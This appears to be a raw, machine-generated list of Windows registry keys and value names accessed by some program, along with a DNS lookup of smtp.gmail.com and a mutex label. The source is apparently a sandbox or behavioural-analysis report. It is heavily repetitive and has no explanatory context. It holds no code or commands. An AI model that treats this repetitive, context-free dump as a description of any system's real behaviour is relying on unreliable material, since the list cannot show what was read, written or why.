SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Std
MUI_Dlt
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack
HKEY_LOCAL_MACHINE
DiagTrackAuthorization
0
REG_DWORD_LITTLE_ENDIAN
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Std
MUI_Dlt
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
Mutex
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
HWRPortReuseOnSocketBind
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
SchUseStrongCrypto
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
SchSendAuxRecord
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
SystemDefaultTlsVersions
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
RequireCertificateEKUs
DNSRecord
smtp.gmail.com
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
